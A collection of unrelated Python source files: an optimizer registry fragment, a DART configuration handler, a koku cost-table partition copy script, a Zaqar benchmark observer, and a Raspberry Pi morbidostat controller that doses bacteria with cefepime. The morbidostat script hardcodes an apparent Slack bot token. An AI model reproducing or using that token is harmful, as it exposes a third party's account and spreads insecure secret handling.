def __init__(self):
self.__optimizer_names = []
self.__optimizer_dict = {}
def __len__(self):
return len(self.__optimizer_names)
@property
def names(self):
return list(self.__optimizer_names)
@property
def optimizers(self):
return list(self.__optimizer_dict.values())
def add_optimizer(self, optimizer, name=None):
if name is None:
name = "optimizer_{}".format(len(self))
self.__optimizer_dict[name] = optimizer
self.__optimizer_names.append(name)
def get_optimizer(self, name):
assert name in self.__optimizer_dict
return self.__optimizer_dict[name]
def remove_optimizer(self, name=None):
if name is None:
name = self.__optimizer_names.pop()
else:
self.__optimizer_names.remove(name)
optimizer = self.__optimizer_dict.pop(name)
return {"name": name, "optimizer": optimizer}
def clear_optimizers(self):
self.reset()
|
configuration.py
|
"""
This handler, when signaled, queries the DartAPI for updated configuration
information for this host. It then updates the supervisord configuration on
disk, updates the shared configurations for monitoring and scheduling, and
triggers a reread of all configurations.
"""
from . import BaseHandler
from ..configurations import ConfigurationsWriter
from dart.common.killer import GracefulEventKiller
from threading import Thread
import requests
import traceback
class ConfigurationHandler(BaseHandler):
def __init__(self, reread_trigger, rewrite_trigger, **kwargs):
super().__init__(**kwargs)
# we can set these to force a reread or a rewrite
self.reread_trigger = reread_trigger
self.rewrite_trigger = rewrite_trigger
# this is how we will trigger the thread so that it knows to exit
self.killer = GracefulEventKiller()
@property
def name(self):
return "configuration"
def can_handle(self, event_type):
# this handler wants nothing from supervisor
return False
def handle(self, event_type, event, data):
# we never get passed anything to handle since we can't handle anything
pass
def start(self):
self.thread = Thread(target=self._run)
self.thread.start()
def stop(self):
self.logger.info("{} handler received signal to stop".format(self.name))
# trigger the event using a thread safe mechanism
self.killer.kill()
# then wait for our thread to be finished
self.thread.join()
# this runs inside of a thread
def _run(self):
# if we haven't received a kill signal then wait for a trigger telling
# us to rewrite our configurations. that trigger is set every sixty
# seconds by TICK events or when we receive a message from the
# coordination handler.
while (not self.killer.killed()):
if (self.rewrite_trigger.wait(timeout=1)):
try:
ConfigurationsWriter().write()
# clear the transient error events
self.events.put({
"data": {
"component": {"name": "agent:{}".format(self.name)},
"severity": "OK",
"message": "clear",
}
})
except requests.RequestException as e:
subject = "could not talk to the DartAPI on {}: {}".format(self.fqdn, e)
message = traceback.format_exc()
self.logger.warning("{} handler {}".format(self.name, subject))
self.logger.warning(message)
# this is a system error, create a escalating incident.
# this event will automatically clear if we are able to
# successfully write our configurations.
self.events.put({
"data": {
"component": {"name": "agent:{}".format(self.name)},
"severity": 2, # high severity
"title": subject,
"message": message,
}
})
except OSError as e:
subject = "could not write configuration files on {}: {}".format(self.fqdn, e)
message = traceback.format_exc()
self.logger.warning("{} handler {}".format(self.name, subject))
self.logger.warning(message)
# this is a system error, create a escalating incident.
# this event will automatically clear if we are able to
# successfully write our configurations.
self.events.put({
"data": {
"component": {"name": "agent:{}".format(self.name)},
"severity": 2, # high severity
"title": subject,
"message": message,
}
})
except Exception as e:
subject = "unexpected error on {}: {}".format(self.fqdn, e)
message = traceback.format_exc()
self.logger.error("{} handler {}".format(self.name, subject))
self.logger.error(message)
# problems that we didn't expect should create
# non-escalating incidents. this event will not clear
# automatically.
self.events.put({
"data": {
"component": {"name": "agent:{}:error".format(self.name)},
"severity": 3, # medium severity
"title": subject,
"message": message,
}
})
finally:
# this clears the trigger so that it can be set again
self.rewrite_trigger.clear()
# now trigger a reread to pick up the configurations that
# just finished writing. if the trigger is already set then
# we will wait before trying to set it again.
self.logger.info("{} handler triggering a reread".format(self.name))
self.reread_trigger.set()
# tell everything that we're done
self.logger.info("{} handler exiting".format(self.name))
|
copy_ocp_aws_azure_data.py
|
#! /usr/bin/env python3.8
import datetime
import json
import logging
import os
import sys
from multiprocessing import Process
from multiprocessing import Queue
import psycopg2
from app_common_python import LoadedConfig
from dateutil.relativedelta import relativedelta
from psycopg2 import ProgrammingError
from psycopg2.errors import ForeignKeyViolation
from psycopg2.extras import RealDictCursor
logging.basicConfig(
format="%(processName)s (%(process)d) :: %(asctime)s: %(message)s",
datefmt="%m/%d/%Y %I:%M:%S %p",
level=getattr(logging, os.environ.get("KOKU_LOG_LEVEL", "INFO")),
)
LOG = logging.getLogger(os.path.basename(sys.argv[0] or "copy_ocp_aws_azure_data_console"))
def connect():
engine = "postgresql"
app = os.path.basename(sys.argv[0])
if bool(os.environ.get("DEVELOPMENT", False)):
user = os.environ.get("DATABASE_USER")
passwd = os.environ.get("DATABASE_PASSWORD")
host = os.environ.get("POSTGRES_SQL_SERVICE_HOST")
port = os.environ.get("POSTGRES_SQL_SERVICE_PORT")
db = os.environ.get("DATABASE_NAME")
else:
user = LoadedConfig.database.username
passwd = LoadedConfig.database.password
host = LoadedConfig.database.hostname
port = LoadedConfig.database.port
db = LoadedConfig.database.name
url = f"{engine}://{user}:{passwd}@{host}:{port}/{db}?sslmode=prefer&application_name={app}"
LOG.info(f"Connecting to {db} at {host}:{port} as {user}")
return psycopg2.connect(url, cursor_factory=RealDictCursor)
def _execute(conn, sql, params=None):
cur = conn.cursor()
LOG.debug(cur.mogrify(sql, params).decode("utf-8"))
cur.execute(sql, params)
return cur
def get_ocpawsazure_tables(conn):
sql = """
with basetable_info as (
select t.relname::text as "basetable_name",
array_agg(tc.attname::text order by tc.attnum) as "basetable_cols"
from pg_class t
join pg_namespace n
on n.oid = t.relnamespace
join pg_attribute tc
on tc.attrelid = t.oid
and tc.attnum > 0
where n.nspname = 'template0'
and t.relkind = 'r'
and t.relname ~ '^reporting_ocp(aws|azure)costlineitem.*_daily_summary$'
group
by t.relname
),
partable_info as (
select t.relname::text as "partable_name",
array_agg(tc.attname::text order by tc.attnum) as "partable_cols"
from pg_class t
join pg_namespace n
on n.oid = t.relnamespace
join pg_attribute tc
on tc.attrelid = t.oid
and tc.attnum > 0
where n.nspname = 'template0'
and t.relkind = 'p'
and t.relname ~ '^reporting_ocp(aws|azure)costlineitem.*_daily_summary_p$'
group
by t.relname
)
select bi.basetable_name,
pi.partable_name,
pi.partable_cols
from partable_info pi
join basetable_info bi
on bi.basetable_name || '_p' = pi.partable_name;
"""
LOG.info("Getting ocp on AWS/Azure base table and partition table info from template schema...")
tables = _execute(conn, sql).fetchall()
return tables
def get_customer_schemata(conn):
sql = """
select t.schema_name
from public.api_tenant t
join public.api_customer c
on c.schema_name = t.schema_name
where t.schema_name ~ '^acct'
and exists (select 1
from public.api_provider p
where p.customer_id = c.id
and (p.type ~ '^AWS' or p.type ~ '^Azure' or p.type ~ '^OCP'))
order by 1;
"""
LOG.info("Getting all customer schemata...")
return [r["schema_name"] for r in _execute(conn, sql).fetchall()]
def drop_partitions(conn, schema_name, partitioned_table):
drop_sql = f"""
delete
from {schema_name}.partitioned_tables
where schema_name = %s
and partition_of_table_name = %s
and partition_parameters->>'default' = 'false';
"""
LOG.info(f"Dropping partitions for {schema_name}.{partitioned_table}")
_execute(conn, drop_sql, (schema_name, partitioned_table))
def get_or_create_partitions(conn, schema_name, partitioned_table, start_date):
get_sql = f"""
select id
from {schema_name}.partitioned_tables
where schema_name = %s
and table_name = %s
and partition_of_table_name = %s;
"""
ins_sql = f"""
insert
into {schema_name}.partitioned_tables
(
schema_name,
table_name,
partition_of_table_name,
partition_type,
partition_col,
partition_parameters,
active
)
values (
%(schema_name)s,
%(table_name)s,
%(partition_of_table_name)s,
%(partition_type)s,
%(partition_col)s,
%(partition_parameters)s,
%(active)s
)
returning id;
"""
one_month = relativedelta(months=1)
partition_start = start_date.replace(day=1)
partition_stop = datetime.date.today().replace(day=1)
partition_parameters = {"default": False}
table_partition_rec = {
"schema_name": schema_name,
"table_name": None,
"partition_of_table_name": partitioned_table,
"partition_type": "range",
"partition_col": "usage_start",
"partition_parameters": None,
"active": True,
}
while partition_start <= partition_stop:
partition_end = partition_start + one_month
partition_name = f"{partitioned_table}_{partition_start.strftime('%Y_%m')}"
if (_execute(conn, get_sql, (schema_name, partition_name, partitioned_table)).fetchone() or {"id": None})[
"id"
]:
LOG.info(f"Found partition {partition_name}")
else:
LOG.info(f"Creating partition {partition_name}")
table_partition_rec["table_name"] = partition_name
partition_parameters["from"] = str(partition_start)
partition_parameters["to"] = str(partition_end)
table_partition_rec["partition_parameters"] = json.dumps(partition_parameters)
_execute(conn, ins_sql, table_partition_rec)
partition_start = partition_end
def get_table_min(conn, schema_name, table_name):
sql = f"""
select min(usage_start)::date as "min_start"
from {schema_name}.{table_name};
"""
LOG.info(f"Getting the minimum table start from {schema_name}.{table_name}")
min_start = _execute(conn, sql).fetchone()["min_start"] or datetime.date.today().replace(day=1)
return min_start
def get_partable_min(conn, schema_name, partable_name):
sql = f"""
select min(usage_start)::date as "min_start"
from {schema_name}.{partable_name};
"""
LOG.info(f"Getting the minimum partition start from {schema_name}.{partable_name}")
min_start = _execute(conn, sql).fetchone()["min_start"] or datetime.date.today().replace(day=1)
return min_start
def copy_data(conn, schema_name, dest_table, dest_cols, source_table):
copy_sql = """
insert
into {schema_name}.{partable_name} ({ins_cols})
select {sel_cols}
from {schema_name}.{basetable_name}
;
"""
sel_cols = ins_cols = ", ".join(dest_cols)
sql = copy_sql.format(
schema_name=schema_name,
partable_name=dest_table,
ins_cols=ins_cols,
sel_cols=sel_cols,
basetable_name=source_table,
)
LOG.info(f"Copying data from {schema_name}.{source_table} to {schema_name}.{dest_table}")
cur = _execute(conn, sql)
records_copied = cur.rowcount
LOG.info(f"Copied {records_copied} records to {schema_name}.{dest_table}")
return records_copied
def process_ocpawsazure_tables(schema_queue): # noqa
with connect() as conn:
while True:
msg = schema_queue.get()
if msg == "DONE":
LOG.info("End of queue found!")
break
work_data = json.loads(msg)
schema = work_data["schema"]
table_info = work_data["table_info"]
tnum = work_data["table_num"]
ttot = work_data["table_tot"]
LOG.info(
f"***** Running copy against schema {schema}.{table_info['basetable_name']} ({tnum}/{ttot}) *****"
)
LOG.info(f"Processing {schema}.{table_info['basetable_name']}")
_execute(conn, f"set search_path = {schema}, public;")
try:
partable_min_date = get_table_min(conn, schema, table_info["basetable_name"])
drop_partitions(conn, schema, table_info["partable_name"])
get_or_create_partitions(conn, schema, table_info["partable_name"], partable_min_date)
except ProgrammingError as p:
LOG.warning(
f"{p.__class__.__name__} :: {p}{os.linesep}Skip processing "
+ f"for {schema}.{table_info['basetable_name']}."
)
conn.rollback()
continue
except Exception as e:
conn.rollback()
LOG.warning(f"VERY WARNING :: {e.__class__.__name__} :: {e}")
continue
else:
try:
conn.commit()
except Exception as x1:
LOG.warning(
f"{x1.__class__.__name__} :: {x1}{os.linesep}Skip processing "
+ f"for {schema}.{table_info['basetable_name']}."
)
conn.rollback()
continue
try:
# copy data earlier than the threshold since it should be static.
copy_data(
conn,
schema,
table_info["partable_name"],
table_info["partable_cols"],
table_info["basetable_name"],
)
except (ProgrammingError, ForeignKeyViolation) as p:
LOG.warning(
f"{p.__class__.__name__} :: {p}{os.linesep}Rolling back copy transaction "
+ f"for {schema}.{table_info['basetable_name']}."
)
conn.rollback()
except Exception as e:
conn.rollback()
LOG.warning(f"VERY WARNING :: {e.__class__.__name__} :: {e}")
else:
try:
conn.commit()
except Exception as x1:
LOG.warning(
f"{x1.__class__.__name__} :: {x1}{os.linesep}Rollback copy transaction on COMMIT exception "
+ f"for {schema}.{table_info['basetable_name']}."
)
conn.rollback()
def main():
# get customer schemata
schemata = tables = None
with connect() as conn:
schemata = get_customer_schemata(conn)
tables = get_ocpawsazure_tables(conn)
if schemata and tables:
# Combine for the individual job work
target_tables = [{"schema": schema, "table_info": table_info} for schema in schemata for table_info in tables]
t_tot = len(target_tables)
del schemata
del tables
# start worker processes
max_workers = int(sys.argv[1]) if len(sys.argv) > 1 else int(os.environ.get("NUM_JOB_WORKERS", 1))
if max_workers > t_tot:
max_workers = t_tot
schema_queues = []
workers = []
for wnum in range(max_workers):
LOG.info(f"Creating worker {len(workers)}")
schema_queues.append(Queue())
workers.append(
Process(target=process_ocpawsazure_tables, name=f"copy_worker_{wnum}", args=((schema_queues[-1]),))
)
workers[-1].daemon = True
workers[-1].start()
# load worker queues
LOG.info("Filling worker queues")
for t_num, data in enumerate(target_tables):
q_num = t_num % max_workers
data["table_num"] = t_num + 1
data["table_tot"] = t_tot
schema_queues[q_num].put(json.dumps(data))
# mark worker queue end
for q in schema_queues:
q.put("DONE")
# wait on all workers
LOG.info("Waiting on workers...")
for wrkr in workers:
wrkr.join()
else:
LOG.info("No schemata or tables found matching the criteria.")
if __name__ == "__main__":
main()
|
observer.py
|
# Copyright (c) 2014 Rackspace, Inc.
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or
# implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from __future__ import division
from __future__ import print_function
import multiprocessing as mp
import random
import sys
import time
from gevent import monkey as curious_george
curious_george.patch_all(thread=False, select=False)
import gevent
import marktime
from six.moves import urllib
from zaqarclient.queues import client
from zaqarclient.transport import errors
from zaqar.bench import config
CONF = config.conf
#
# TODO(kgriffs): Factor out the common code from producer, consumer
# and worker (DRY all the things!)
#
def _extract_marker(links):
for link in links:
if link['rel'] == 'next':
href = link['href']
break
query = urllib.parse.urlparse(href).query
params = urllib.parse.parse_qs(query)
return params['marker'][0]
def observer(queues, stats, test_duration, limit):
"""Observer Worker
The observer lists messages without claiming them.
"""
end = time.time() + test_duration
total_elapsed = 0
total_succeeded = 0
total_failed = 0
queues = [{'q': q, 'm': None} for q in queues]
while time.time() < end:
# NOTE(kgriffs): Distribute requests across all queues evenly.
queue = random.choice(queues)
try:
marktime.start('list_messages')
cursor = queue['q'].messages(limit=limit, marker=queue['m'],
include_claimed=True)
total_elapsed += marktime.stop('list_messages').seconds
total_succeeded += 1
messages = list(cursor)
if messages:
# TODO(kgriffs): Figure out a less hacky way to do this
# while preserving the ability to measure elapsed time
# per request.
queue['m'] = _extract_marker(cursor._links)
except errors.TransportError as ex:
sys.stderr.write("Could not list messages : {0}\n".format(ex))
total_failed += 1
total_requests = total_succeeded + total_failed
stats.put({
'total_requests': total_requests,
'total_succeeded': total_succeeded,
'total_elapsed': total_elapsed,
})
def load_generator(stats, num_workers, num_queues,
test_duration, limit):
cli = client.Client(CONF.server_url)
queues = [cli.queue(CONF.queue_prefix + '-' + str(i))
for i in range(num_queues)]
gevent.joinall([
gevent.spawn(observer,
queues, stats, test_duration, limit)
for _ in range(num_workers)
])
def crunch(stats):
total_requests = 0
total_succeeded = 0
total_elapsed = 0.0
while not stats.empty():
entry = stats.get_nowait()
total_requests += entry['total_requests']
total_succeeded += entry['total_succeeded']
total_elapsed += entry['total_elapsed']
return total_requests, total_succeeded, total_elapsed
def run(upstream_queue):
num_procs = CONF.observer_processes
num_workers = CONF.observer_workers
num_queues = CONF.num_queues
# Stats that will be reported
duration = 0
total_requests = 0
total_succeeded = 0
throughput = 0
latency = 0
# Performance test
if num_procs and num_workers:
test_duration = CONF.time
stats = mp.Queue()
args = (stats, num_workers, num_queues, test_duration,
CONF.messages_per_list)
procs = [mp.Process(target=load_generator, args=args)
for _ in range(num_procs)]
if CONF.verbose:
print('\nStarting observer (op={0}, ow={1})...'.format(
num_procs, num_workers))
start = time.time()
for each_proc in procs:
each_proc.start()
for each_proc in procs:
each_proc.join()
(total_requests, total_succeeded, total_elapsed) = crunch(stats)
duration = time.time() - start
throughput = total_succeeded / duration
if total_succeeded:
latency = (1000 * total_elapsed / total_succeeded)
upstream_queue.put({
'observer': {
'duration_sec': duration,
'total_reqs': total_requests,
'successful_reqs': total_succeeded,
'reqs_per_sec': throughput,
'ms_per_req': latency,
}
})
|
vish_control_drugs.py
|
#!/usr/bin/python3
"""The basic idea is this: the bugs grow for a certain period of time, dt. After this time, if their optical density,
OD, (as read by a photodetector) is above a threshhold, OD_thr, and they have grown since the last time point, drug is
administered through a pump, P_drug. If OD is less than OD_thr, then nutrient solution is added through another pump,
P_nut.
This system will be controlled by a Raspberry Pi, using the SPI and GPIO ports. To activate the pumps, GPIO ports are
set to 1/GPIO.HIGH/True for a certain period of time, t_pump. Optical density data is read via an analogue to digital
converter attached to one of the SPI ports on the RPi.
Data will be saved on the RPi and stored in the cloud. Using the Slack API, we will be able to query the RPi to find
out how the experiment is progressing."""
# Needed for Running the Pumps
import time
from datetime import datetime
import csv
import threading
import os
from subprocess import call
from subprocess import Popen, PIPE
import RPi.GPIO as GPIO
import numpy as np
import board
import busio
import adafruit_ads1x15.ads1015 as ADS
from adafruit_ads1x15.analog_in import AnalogIn
# Needed for Slack Integration
import re
import json
# import psutil
from slackclient import SlackClient
# Needed for Screenshots
#import gtk.gdk
from subprocess import call
#Graphs
import pandas as pd
import matplotlib.pyplot as plt
# Define Experimental Variables
time_between_pumps = 12 # how often to activate pumps, in minutes
OD_thr = 1.5 # threshold above which to activate drug pump [vish bench tests: empty: 3.5V, Clear Vial: 0.265V, Very Cloudy Vial: 2.15V]
OD_min = .7 # minimum OD needed to run the loop that activates pumps; 55
time_between_ODs = 2 # how often to gather OD data, in seconds
time_between_graphs = 30 # how often to graph, in minutes
#time_between_writes = 1 # how often to write out OD data, in minutes
total_time = 48*60*60 #in seconds, default is 2 days
loops_between_ODs = 1
loops_between_pumps = (time_between_pumps*60)/time_between_ODs # time between pumps in loops
#loops_between_writes = (time_between_writes*60)/time_between_ODs # time bewteen writes in loops
num_cham = 1 # number of morbidostat vials being used
OD_av_length = 30 #number of OD measurements to be averaged
# Setup the GPIO Pins to Control the Pumps
P_drug_pins = [20]
P_nut_pins = [24]
P_waste_pins = [25]
P_LED_pins = [21]
P_fan_pins = [26]
pin_list = [P_drug_pins + P_nut_pins + P_waste_pins + P_LED_pins + P_fan_pins]
GPIO.setmode(GPIO.BCM)
for pin in pin_list:
GPIO.setup(pin, GPIO.OUT)
# GPIO.output(pin,0)
# GPIO.output(P_fan_pins,1)
# Set Up I2C to Read OD Data
# Create the I2C bus
i2c = busio.I2C(board.SCL, board.SDA)
# Create the ADC object using the I2C bus
ads = ADS.ADS1015(i2c)
# Create single-ended input on channel 0
# photoreceptor_channel = 0
photod = AnalogIn(ads, ADS.P0)
# P_drug_times = [2/1.4]
# P_nut_times = [2/1.6]
# P_waste_times = [2/1.6]
P_drug_times = .75
P_nut_times = .75
P_waste_times = .75
# Set Up Reporting for Slack
slack_client = SlackClient("xoxb-15598920096-507190138311-pIsmBndOCk1YsVbflP5qXnnT")
user_list = slack_client.api_call("users.list")
for user in user_list.get('members'):
if user.get('name')== "blob":
slack_user_id = user.get('id')
break
if slack_client.rtm_connect():
print ("Connected!")
#Report on RAM usage every half hour
class Morbidostat():
# Read data from the ADC
def __init__(self):
self.running_data = [] # the list which will hold our 2-tuples of time and OD
self.pump_data = []
# self.currOD = np.zeros(num_cham)
self.currOD = 0
# averaged OD value
# self.avOD = np.zeros(num_cham)
self.avOD = 0
# OD averaging buffer
self.avOD_buffer = np.zeros(OD_av_length)#need to change for multiplexing
self.start_time = datetime.now()
os.makedirs("/mnt/morbidodata/"+str(self.start_time))
self.elapsed_loop_time = 0
self.loops = 0
self.last_dilutionOD = 0
self.nut = 0
self.drug = 1
self.waste = 2
self.drug_mass = 0
self.outfile_OD = "/mnt/morbidodata/%s/ODdata_%s.csv" % (self.start_time, self.start_time)
file = open(self.outfile_OD, 'a')
wr = csv.writer(file)
# wr.writerow(['Current OD', 'Average OD','OD Timing'])
wr.writerow(['current', 'average','time','hour'])
file.close()
self.outfile_pump = "/mnt/morbidodata/%s/pump_%s.csv" % (self.start_time, self.start_time)
file = open(self.outfile_pump, 'a')
wr = csv.writer(file)
# wr.writerow(['Nutrient Pump', 'Drug Pump','Waste Pump','Pump Timing', 'Drug Mass'])
wr.writerow(['media', 'drug','waste','pump_time','hour','drug_mass'])
file.close()
# print('Experiment begun at %02s:%02s:%02s' % (self.start_time.hour, self.start_time.minute, self.start_time.second))
print(self.start_time.strftime('Experiment begun at %H:%M:%S on %a - %b %d, %Y'))
self.on_timer()
slack_client.api_call(
"chat.postMessage",
channel='#morbidotest',
text = self.start_time.strftime('Experiment begun at %H:%M:%S on %a - %b %d, %Y'),
as_user=True)
def get_OD(self):
GPIO.output(P_LED_pins,1)
# self.value = []
#self.cpu_pct = psutil.cpu_percent(interval=1, percpu=True)
time.sleep(0.1)
# for i in photoreceptor_channel_pins:
# self.value.append( adc.read_adc(i))
# self.value.append(photod.voltage)
self.currOD = photod.voltage #np.asarray(self.value)#[0]
time.sleep(0.1)
GPIO.output(P_LED_pins,0)
#print("OD: current voltage (raw) = ", self.currOD[0:num_cham])
#print('Elapsed Time: %02s:%02s:%02s; OD = ' % (self.now.hour, self.now.minute, self.now.second), self.currOD[0:num_cham])
#process the data
#self.avOD_buffer = np.append(self.avOD_buffer, self.currOD.reshape(1,num_cham), axis=0) #might need to transpose if more than one pd (for multiplexing)
self.avOD_buffer = np.append(self.avOD_buffer, self.currOD) #might need to transpose if more than one pd (for multiplexing)
# then remove the first item in the array, i.e. the oldest
self.avOD_buffer = np.delete(self.avOD_buffer, 0)
# calculate average for each flask
self.avOD = np.mean(self.avOD_buffer)
def pump_on(self,pump):
GPIO.output(pump, 1)
print('Turning on pump',pump)
def pump_off(self,pump):
GPIO.output(pump, 0)
print('Turning off pump',pump)
def all_pump_off(self):
for i in pin_list:
GPIO.output(i, 0)
print('Turning off all pumps')
def savefunc(self):
print('saving to disk')
OD_tmplist = []
pump_tmplist = []
# for i in range(num_cham):
# OD_tmplist.append(self.currOD[i])
# OD_tmplist.append(self.avOD[i])
OD_tmplist.append(self.currOD)
OD_tmplist.append(self.avOD)
# file = open(self.outfile_OD, 'ab')
with open(self.outfile_OD, 'a') as file:
# OD_tmplist.append(self.now)
OD_tmplist.append(self.nows)
OD_tmplist.append((86400 - self.elapsed_time.seconds)/3600)
wr = csv.writer(file)
wr.writerow(OD_tmplist)
file.close()
# file = open(self.outfile_pump, 'ab')
# pump_tmplist =[self.nut,self.drug,self.waste,self.now,self.drug_mass]
pump_tmplist =[self.nut,self.drug,self.waste,self.nows,(86400 - self.elapsed_time.seconds)/3600,self.drug_mass]
with open(self.outfile_pump, 'a') as file:
wr = csv.writer(file)
wr.writerow(pump_tmplist)
file.close()
self.nut = 0
self.drug = 1
self.waste = 2
def graphOD(self):
print('generating graph')
# slack_client.api_call(
# "chat.postmessage",
# channel='#morbidotest',
# text = "the graph goes here!",
# as_user=true)
slack_client.api_call(
"chat.postMessage",
channel='#morbidotest',
text = ('Elapsed Time: %s ; OD = %.3f' % (self.secondsToText(86400 - self.elapsed_time.seconds),self.currOD)),
as_user=True)
#print ('Elapsed Time: %s; OD = %.3f' % (self.secondsToText(86400 - self.elapsed_time.seconds),self.currOD))
allODs = pd.read_csv(self.outfile_OD, index_col='hour')
# allODs['hour'] = allODs['time'] - allODs['time'].iloc[0]
# allODs['hour'] = allODs['hour'].divide(3600)
# allODs.set_index('hour')
# print(allODs)
#fig = plt.figure(dpi=1000)
plt.rcParams["figure.dpi"] = 200
ODplt = (allODs[['average']]).plot() #figsize=(10,10) in the plot
# ODplt = (allODs[['current']]).plot() #figsize=(10,10) in the plot
ODfig = ODplt.get_figure()
ODfig.savefig("/mnt/morbidodata/%s/ODplot_%s.png" % (self.start_time, self.start_time))
ODplt = None; ODfig = None; fig = None
with open("/mnt/morbidodata/%s/ODplot_%s.png" % (self.start_time, self.start_time), "rb") as file_content:
slack_client.api_call(
"files.upload",
channels='morbidotest',
title = "ODPlot",
file = file_content,
)
allpumps = pd.read_csv(self.outfile_pump, index_col='hour') # cols: 'media', 'drug','waste','pump_time','hour','drug_mass'
allconcs = allpumps[['drug_mass']]/12
allconcs.rename(columns={'drug_mass':'drug_conc'}, inplace=True)
# allODs['hour'] = allODs['time'] - allODs['time'].iloc[0]
# allODs['hour'] = allODs['hour'].divide(3600)
# allODs.set_index('hour')
# print(allODs)
#fig = plt.figure(dpi=1000)
colors = getattr(getattr(pd.plotting, '_style'), '_get_standard_colors')(num_colors=2)
plt.rcParams["figure.dpi"] = 200
ODplt = (allODs[['average']]).plot(label='average', color=colors[0]) #figsize=(10,10) in the plot
ODplt.set_ylabel(ylabel='Average OD')
lines, labels = ODplt.get_legend_handles_labels()
DM = ODplt.twinx()
DM.spines['right'].set_position(('axes', 1.0))
allconcs.plot(ax = DM, label='drug_mass',color=colors[1],legend=False)
DM.set_ylabel(ylabel='Drug Concentration (ug/mL)')
line, label = DM.get_legend_handles_labels()
lines += line
labels += label
ODplt.legend(lines, labels, loc=2)
# ODplt = (allODs[['current']]).plot() #figsize=(10,10) in the plot
ODfig = ODplt.get_figure()
ODfig.savefig("/mnt/morbidodata/%s/ODconc_%s.png" % (self.start_time, self.start_time),bbox_inches='tight')
ODplt.figure = None; ODplt = None; ODfig = None; fig = None; allconcs= None; colors = None; DM = None
with open("/mnt/morbidodata/%s/ODconc_%s.png" % (self.start_time, self.start_time), "rb") as file_content:
slack_client.api_call(
"files.upload",
channels='morbidotest',
title = "ODConc",
file = file_content,
)
pumpa = allpumps[['media','drug','waste']]
colors = getattr(getattr(pd.plotting, '_style'), '_get_standard_colors')(num_colors=4)
PUplt = (allODs[['average']]).plot(label='average', color=colors[0])
PUplt.set_ylabel(ylabel='Average OD')
lines, labels = PUplt.get_legend_handles_labels()
DM = PUplt.twinx()
DM.spines['right'].set_position(('axes', 1.0))
pumpa.plot(ax = DM,color=colors[1:4],legend=False)
DM.set_yticklabels([])
line, label = DM.get_legend_handles_labels()
lines += line
labels += label
PUplt.legend(lines, labels, loc=2)
PUfig = PUplt.get_figure()
PUfig.savefig("/mnt/morbidodata/%s/PUplot_%s.png" % (self.start_time, self.start_time))
allODs = None; allpumps = None; PUplt.figure = None; PUplt = None; PUfig = None; fig = None; allconcs= None; colors = None; DM = None; pumpa = None
with open("/mnt/morbidodata/%s/PUplot_%s.png" % (self.start_time, self.start_time), "rb") as file_content:
slack_client.api_call(
"files.upload",
channels='morbidotest',
title = "PUPlot",
file = file_content,
)
# def graph_upload(self):
# with open("/mnt/morbidodata/%s/ODplot_%s.png" % (self.start_time, self.start_time), "rb") as file_content:
# slack_client.api_call(
# "files.upload",
# channels='morbidotest',
# title = "ODPlot",
# file = file_content,
# )
# slack_client.api_call(
# "files.upload",
# channels='morbidotest',
# filename = PUplt,
# title = "PUPlot",
# file = open("/mnt/morbidodata/%s/PUplot_%s.png" % (self.start_time, self.start_time), "rb"),
# as_user = True)
def morbidostat(self):
# for i in range(num_cham):
if self.avOD > OD_min:
threading.Thread(target=self.pump_on, args=(P_waste_pins,)).start()
threading.Timer(P_waste_times,self.pump_off, args=(P_waste_pins,)).start()
self.waste = 3
self.drug_mass = self.drug_mass - (self.drug_mass/12)
if self.avOD > OD_thr and self.avOD > self.last_dilutionOD:
print('OD Threshold exceeded, pumping cefepime')
threading.Thread(target=self.pump_on, args=(P_drug_pins,)).start()
threading.Timer(P_drug_times,self.pump_off, args=(P_drug_pins,)).start()
self.drug = 2
self.drug_mass = self.drug_mass + 2.5
slack_client.api_call(
"chat.postMessage",
channel='#morbidotest',
text = "OD = %0.3f, pumping cefepime. Cefepime concentration: %f ug/mL" % (self.avOD, (self.drug_mass)/12),
as_user=True)
else:
print('OD below threshold, pumping nutrient')
threading.Thread(target=self.pump_on, args=(P_nut_pins,)).start()
threading.Timer(P_nut_times,self.pump_off, args=(P_nut_pins,)).start()
self.nut = 1
slack_client.api_call(
"chat.postMessage",
channel='#morbidotest',
text = "OD = %0.3f, pumping nutrient. Cefepime concentration: %f ug/mL" % (self.avOD, (self.drug_mass)/12),
as_user=True)
else: #report even when pumps aren't activated yet
self.drug_mass = 0
slack_client.api_call(
"chat.postMessage",
channel='#morbidotest',
text = "OD = %0.3f, OD below nutrient pump threshold." % (self.avOD),
as_user=True)
self.last_dilutionOD = self.avOD
def secondsToText(self,secs):
days = secs//86400
hours = (secs - days*86400)//3600
minutes = (secs - days*86400 - hours*3600)//60
seconds = secs - days*86400 - hours*3600 - minutes*60
result = ("{0} day{1}, ".format(days, "s" if days!=1 else "") if days else "") + \
("{0} hour{1}, ".format(hours, "s" if hours!=1 else "") if hours else "") + \
("{0} minute{1}, ".format(minutes, "s" if minutes!=1 else "") if minutes else "") + \
("{0} second{1}, ".format(seconds, "s" if seconds!=1 else "") if seconds else "")
return result[:-2]
def on_timer(self):
if self.loops < total_time/time_between_ODs:
threading.Timer(time_between_ODs,self.on_timer).start()
else:
self.now = datetime.now()
self.nows = time.time()
print('Experiment Complete at %02s:%02s:%02s ' % (self.now.hour, self.now.minute, self.now.second))
# GPIO.output(P_fan_pins,0)
slack_client.api_call(
"chat.postMessage",
channel='#morbidotest',
text = "Experiment Complete at %02s:%02s:%02s " % (self.now.hour, self.now.minute, self.now.second),
as_user=True)
self.loops += 1
#print(self.loops)
# note the time the loop starts
self.now = datetime.now()
self.nows = time.time()
self.beginning = time.time()
# read OD data to be used for both controlling and saving during this loop
threading.Thread(target=self.get_OD()).start()
self.elapsed_time = self.start_time - self.now
# save the data to disk if it's time (threaded to preserve time b/w ODs if this takes > time_between_ODs)
threading.Thread(self.savefunc()).start()
#self.elapsed_time_h = datetime(1,1,1) + self.elapsed_time
print ('Elapsed Time: %s ; OD = %.3f' % (self.secondsToText(86400 - self.elapsed_time.seconds),self.currOD))
# activate pumps if needed and it's time (threaded to preserve time b/w ODss if this takes > time_between_OD
if self.loops % (loops_between_pumps ) == 0:
threading.Thread(self.morbidostat()).start()
# Graph if it is time per the global var
if (self.loops % int(time_between_graphs*60/time_between_ODs)) == 0:
threading.Thread(self.graphOD()).start()
# note the time the functions end
self.end = time.time()
self.interval = self.beginning - self.end
